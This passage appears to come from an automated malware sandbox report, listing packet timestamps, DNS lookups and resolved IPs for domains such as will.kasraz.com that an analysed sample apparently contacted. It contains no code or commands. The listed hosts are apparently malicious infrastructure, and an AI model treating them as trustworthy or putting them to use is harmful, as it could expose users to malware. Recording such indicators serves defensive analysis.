                                                                                                                                                              May 4, 2021 16:58:51.581994057 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.581995010 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.582010031 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.582012892 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.582030058 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.582032919 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.582045078 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.582046032 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.582061052 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.582062960 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.582076073 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.582084894 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.582093000 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.582098007 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.582109928 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.582112074 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.582123995 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.582125902 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.582143068 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.582149982 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.582159042 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.582160950 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.582174063 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.582178116 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.582192898 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.582195997 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.582211971 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.582212925 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.582226992 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.582228899 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.582245111 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.582246065 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.582257032 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.582259893 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.582273960 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.582277060 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.582288027 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.582289934 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.582303047 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.582325935 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.583479881 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.719767094 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.719794989 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.719818115 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.719842911 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.719866991 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.719892025 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.719913960 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.719921112 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.719935894 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.719940901 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.719947100 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.719955921 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.719973087 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.719980001 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.719997883 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720016956 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720019102 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720027924 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720041990 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720052958 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720066071 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720073938 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720088005 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720098972 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720114946 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720118999 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720140934 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720150948 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720166922 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720175028 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720191956 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720201015 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720216036 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720223904 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720237970 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720248938 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720261097 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720266104 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720288038 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720294952 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720312119 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720320940 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720335960 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720345020 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720356941 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720371962 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720379114 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720383883 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720401049 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720410109 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720422983 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720432997 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720444918 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720452070 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720467091 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720477104 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720491886 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720500946 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720515966 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720524073 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720536947 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720546007 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720560074 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720566988 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720582008 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720586061 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720602989 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720612049 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720626116 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720634937 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720649004 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720654964 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720674038 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720676899 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720696926 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720701933 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720722914 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720725060 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720747948 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720750093 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720772982 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720776081 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720798969 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720802069 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720824957 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720828056 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720854044 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720901012 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720921040 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720931053 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720942020 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720947981 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720966101 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720984936 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720988989 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720993042 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.721015930 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.721018076 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.721041918 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.721044064 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.721069098 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.721071959 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.721097946 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.721101999 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.721120119 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.721127987 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.721143961 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.721148014 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.721165895 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.721174002 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.721189976 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.721194983 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.721214056 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.721216917 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.721239090 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.721240997 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.721265078 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.721266985 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.721290112 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.721292019 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.721311092 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.721319914 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.721339941 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.722856045 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:52.290090084 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:59:58.076400042 CEST4916980192.168.2.22198.54.117.210
                                                                                                                                                              May 4, 2021 16:59:58.265185118 CEST8049169198.54.117.210192.168.2.22
                                                                                                                                                              May 4, 2021 16:59:58.265433073 CEST4916980192.168.2.22198.54.117.210
                                                                                                                                                              May 4, 2021 16:59:58.265768051 CEST4916980192.168.2.22198.54.117.210
                                                                                                                                                              May 4, 2021 16:59:58.453208923 CEST8049169198.54.117.210192.168.2.22
                                                                                                                                                              May 4, 2021 16:59:58.453234911 CEST8049169198.54.117.210192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:03.816739082 CEST4917080192.168.2.22108.177.174.182
                                                                                                                                                              May 4, 2021 17:00:04.009216070 CEST8049170108.177.174.182192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:04.009413958 CEST4917080192.168.2.22108.177.174.182
                                                                                                                                                              May 4, 2021 17:00:04.009607077 CEST4917080192.168.2.22108.177.174.182
                                                                                                                                                              May 4, 2021 17:00:04.202766895 CEST8049170108.177.174.182192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:04.202800989 CEST8049170108.177.174.182192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:04.202812910 CEST8049170108.177.174.182192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:04.202828884 CEST8049170108.177.174.182192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:04.202841043 CEST8049170108.177.174.182192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:04.203092098 CEST4917080192.168.2.22108.177.174.182
                                                                                                                                                              May 4, 2021 17:00:04.203119040 CEST4917080192.168.2.22108.177.174.182
                                                                                                                                                              May 4, 2021 17:00:09.644946098 CEST4917180192.168.2.22103.5.116.132
                                                                                                                                                              May 4, 2021 17:00:09.928339005 CEST8049171103.5.116.132192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:09.928442001 CEST4917180192.168.2.22103.5.116.132
                                                                                                                                                              May 4, 2021 17:00:09.929189920 CEST4917180192.168.2.22103.5.116.132
                                                                                                                                                              May 4, 2021 17:00:10.211747885 CEST8049171103.5.116.132192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:10.211775064 CEST8049171103.5.116.132192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:10.211793900 CEST8049171103.5.116.132192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:10.211937904 CEST4917180192.168.2.22103.5.116.132
                                                                                                                                                              May 4, 2021 17:00:10.211992979 CEST4917180192.168.2.22103.5.116.132
                                                                                                                                                              May 4, 2021 17:00:10.496335030 CEST8049171103.5.116.132192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:15.400341988 CEST4917280192.168.2.2254.156.162.121
                                                                                                                                                              May 4, 2021 17:00:15.536916971 CEST804917254.156.162.121192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:15.537101030 CEST4917280192.168.2.2254.156.162.121
                                                                                                                                                              May 4, 2021 17:00:15.537406921 CEST4917280192.168.2.2254.156.162.121
                                                                                                                                                              May 4, 2021 17:00:15.675709963 CEST804917254.156.162.121192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:15.678083897 CEST804917254.156.162.121192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:15.678112984 CEST804917254.156.162.121192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:15.678128004 CEST804917254.156.162.121192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:15.678139925 CEST804917254.156.162.121192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:15.678153992 CEST804917254.156.162.121192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:15.678167105 CEST804917254.156.162.121192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:15.678286076 CEST4917280192.168.2.2254.156.162.121
                                                                                                                                                              May 4, 2021 17:00:15.678312063 CEST4917280192.168.2.2254.156.162.121
                                                                                                                                                              May 4, 2021 17:00:15.678378105 CEST4917280192.168.2.2254.156.162.121
                                                                                                                                                              May 4, 2021 17:00:20.833360910 CEST4917380192.168.2.2266.235.200.147
                                                                                                                                                              May 4, 2021 17:00:20.874897003 CEST804917366.235.200.147192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:20.875051022 CEST4917380192.168.2.2266.235.200.147
                                                                                                                                                              May 4, 2021 17:00:20.875209093 CEST4917380192.168.2.2266.235.200.147
                                                                                                                                                              May 4, 2021 17:00:20.917674065 CEST804917366.235.200.147192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:21.241594076 CEST804917366.235.200.147192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:21.241620064 CEST804917366.235.200.147192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:21.241816998 CEST804917366.235.200.147192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:21.241921902 CEST4917380192.168.2.2266.235.200.147
                                                                                                                                                              May 4, 2021 17:00:21.241950035 CEST4917380192.168.2.2266.235.200.147
                                                                                                                                                              May 4, 2021 17:00:21.241954088 CEST4917380192.168.2.2266.235.200.147
                                                                                                                                                              May 4, 2021 17:00:26.848036051 CEST4917480192.168.2.22157.7.107.165
                                                                                                                                                              May 4, 2021 17:00:27.157701015 CEST8049174157.7.107.165192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:27.157814980 CEST4917480192.168.2.22157.7.107.165
                                                                                                                                                              May 4, 2021 17:00:27.158471107 CEST4917480192.168.2.22157.7.107.165
                                                                                                                                                              May 4, 2021 17:00:27.465367079 CEST8049174157.7.107.165192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:28.176165104 CEST4917480192.168.2.22157.7.107.165
                                                                                                                                                              May 4, 2021 17:00:28.522905111 CEST8049174157.7.107.165192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:29.320266962 CEST8049174157.7.107.165192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:29.320286989 CEST8049174157.7.107.165192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:29.320462942 CEST4917480192.168.2.22157.7.107.165
                                                                                                                                                              May 4, 2021 17:00:29.320487976 CEST4917480192.168.2.22157.7.107.165

                                                                                                                                                              UDP Packets

                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              May 4, 2021 16:58:50.262860060 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                              May 4, 2021 16:58:50.322031975 CEST53521978.8.8.8192.168.2.22
                                                                                                                                                              May 4, 2021 16:59:57.998733044 CEST5309953192.168.2.228.8.8.8
                                                                                                                                                              May 4, 2021 16:59:58.061913013 CEST53530998.8.8.8192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:03.454328060 CEST5283853192.168.2.228.8.8.8
                                                                                                                                                              May 4, 2021 17:00:03.815098047 CEST53528388.8.8.8192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:09.324558973 CEST6120053192.168.2.228.8.8.8
                                                                                                                                                              May 4, 2021 17:00:09.642800093 CEST53612008.8.8.8192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:15.242461920 CEST4954853192.168.2.228.8.8.8
                                                                                                                                                              May 4, 2021 17:00:15.398833036 CEST53495488.8.8.8192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:20.680871010 CEST5562753192.168.2.228.8.8.8
                                                                                                                                                              May 4, 2021 17:00:20.832115889 CEST53556278.8.8.8192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:26.246644020 CEST5600953192.168.2.228.8.8.8
                                                                                                                                                              May 4, 2021 17:00:26.539231062 CEST53560098.8.8.8192.168.2.22

                                                                                                                                                              DNS Queries

                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                              May 4, 2021 16:58:50.262860060 CEST192.168.2.228.8.8.80xa8c1Standard query (0)will.kasraz.comA (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 16:59:57.998733044 CEST192.168.2.228.8.8.80xa14dStandard query (0)www.donelys.comA (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:03.454328060 CEST192.168.2.228.8.8.80xccffStandard query (0)www.discjockeydelraybeach.comA (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:09.324558973 CEST192.168.2.228.8.8.80x2e78Standard query (0)www.arfjkacsgatfzbazpdth.comA (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:15.242461920 CEST192.168.2.228.8.8.80x2f03Standard query (0)www.girlboyfriends.comA (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:20.680871010 CEST192.168.2.228.8.8.80x3c4eStandard query (0)www.burundiacademyst.comA (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:26.246644020 CEST192.168.2.228.8.8.80x6ec7Standard query (0)www.pipienta.comA (IP address)IN (0x0001)

                                                                                                                                                              DNS Answers

                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                              May 4, 2021 16:58:50.322031975 CEST8.8.8.8192.168.2.220xa8c1No error (0)will.kasraz.com192.3.122.177A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 16:59:58.061913013 CEST8.8.8.8192.168.2.220xa14dNo error (0)www.donelys.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                              May 4, 2021 16:59:58.061913013 CEST8.8.8.8192.168.2.220xa14dNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 16:59:58.061913013 CEST8.8.8.8192.168.2.220xa14dNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 16:59:58.061913013 CEST8.8.8.8192.168.2.220xa14dNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 16:59:58.061913013 CEST8.8.8.8192.168.2.220xa14dNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 16:59:58.061913013 CEST8.8.8.8192.168.2.220xa14dNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 16:59:58.061913013 CEST8.8.8.8192.168.2.220xa14dNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 16:59:58.061913013 CEST8.8.8.8192.168.2.220xa14dNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:03.815098047 CEST8.8.8.8192.168.2.220xccffNo error (0)www.discjockeydelraybeach.com108.177.174.182A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:09.642800093 CEST8.8.8.8192.168.2.220x2e78No error (0)www.arfjkacsgatfzbazpdth.com103.5.116.132A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:15.398833036 CEST8.8.8.8192.168.2.220x2f03No error (0)www.girlboyfriends.comcomingsoon.namebright.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:15.398833036 CEST8.8.8.8192.168.2.220x2f03No error (0)comingsoon.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:15.398833036 CEST8.8.8.8192.168.2.220x2f03No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com54.156.162.121A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:15.398833036 CEST8.8.8.8192.168.2.220x2f03No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com34.225.90.193A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:15.398833036 CEST8.8.8.8192.168.2.220x2f03No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com54.210.163.104A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:15.398833036 CEST8.8.8.8192.168.2.220x2f03No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com54.204.83.175A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:15.398833036 CEST8.8.8.8192.168.2.220x2f03No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com3.81.223.53A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:15.398833036 CEST8.8.8.8192.168.2.220x2f03No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com34.224.148.46A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:15.398833036 CEST8.8.8.8192.168.2.220x2f03No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com18.205.135.125A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:15.398833036 CEST8.8.8.8192.168.2.220x2f03No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com34.225.3.125A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:20.832115889 CEST8.8.8.8192.168.2.220x3c4eNo error (0)www.burundiacademyst.comburundiacademyst.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:20.832115889 CEST8.8.8.8192.168.2.220x3c4eNo error (0)burundiacademyst.com66.235.200.147A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:26.539231062 CEST8.8.8.8192.168.2.220x6ec7No error (0)www.pipienta.com157.7.107.165A (IP address)IN (0x0001)

                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                              • will.kasraz.com
                                                                                                                                                              • www.donelys.com
